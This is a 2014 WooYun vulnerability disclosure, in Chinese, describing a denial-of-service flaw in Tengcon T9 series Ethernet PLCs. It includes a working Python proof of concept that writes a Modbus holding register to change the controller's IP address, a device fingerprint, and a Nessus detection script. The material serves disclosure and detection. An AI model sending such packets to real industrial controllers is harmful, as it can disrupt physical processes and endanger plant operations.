[公开漏洞]Tengcon T9系列以太网PLC-Denial Of Service

来源：WooYun　浏览：691次　时间：2014-06-12

Tengcon T9系列以太网PLC-Denial Of Service 相关厂商：北京腾控科技有限公司漏洞作者：Z-0ne 提交时间：2014-04-26 18:26 公开时间：2014-06-10 18:26 漏洞类型：设计缺陷/逻辑错误危害等级：高自评Rank：10 漏洞状态：已交由第三方厂商(cncert国家互联网应急中心)处理漏洞来源：http://www.wooyun.org Tags标签：逻辑错误设计不当工控安全 PLC 工控协议边界防护漏洞详情披露状态：

2014-04-26：细节已通知厂商并且等待厂商处理中
2014-04-30：厂商已经确认，细节仅向厂商公开
2014-05-10：细节向核心白帽子及相关领域专家公开
2014-05-20：细节向普通白帽子公开
2014-05-30：细节向实习白帽子公开
2014-06-10：细节向公众公开

简要描述：

对PLC攻击最最最最最最简单的一个示例，或许你已经猜到了，不知道算不算漏洞，功能和安全在如今你说该怎么选择？
大家可以多关注关注这些方面~

详细说明：

官方说明书：http://www.tengcon.com/download/T9_Hardware_Manual_V01.201106.rar

传统串口Modbus虽然有从站地址作为通讯唯一认证但是也只有1-255，而Modbus Tcp虽然定义了从站地址字段，但是通讯时可以被忽略，个人感觉把运行、停止、IP配置、串口配置等设置信息直接存放在可直接修改的HR寄存器是不妥的做法，况且此系列PLC还有以太网接口。

漏洞证明：

例如修改第82个HR寄存器第为254，操作这些寄存器可即时修改PLC IP地址，造成拒绝服务

import sys

import socket

 

test = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

test.connect(('127.0.0.1', 502))

test.send('\x00\x00\x00\x00\x00\x06\x01\x06\x00\x52\x00\xfe')

str = repr(test.recv(1024))

print str

腾控T9系列PLC指纹信息：

第一二个HR寄存器均为55aa，可以作为设备识别的手段

Nessus脚本代码片段

#

#  start~

#

include("revisions-lib.inc");

include("misc_func.inc");   



###TCP###

#定义端口变量

port=502;

#请填充"端口号"字段



#辨别端口状态

if(!(get_tcp_port_state(port)))exit(0);



#建立套接字

soc = open_sock_tcp(port);

if(soc)

{

#发送数据

send(socket:soc, data:raw_string(0x00,0x00,0x00,0x00,0x00,

0x06,0x01,0x03,0x00,0x01,

0x00,0x01));

#请填充"发送数据内容"字段



#接收数据

r = recv(socket:soc, length:1024);

#请填充"接收字段长度"字段

if(r == raw_string(0x00,0x00,0x00,0x00,0x00,

0x05,0x01,0x03,0x01,

0x55,0xaa))

{

  report = "Tengcon T9 PLC Modbus TCP is Runing!";

  security_warning(port:port,data:report);

}

#关闭套接字security_warning

###TCP###

}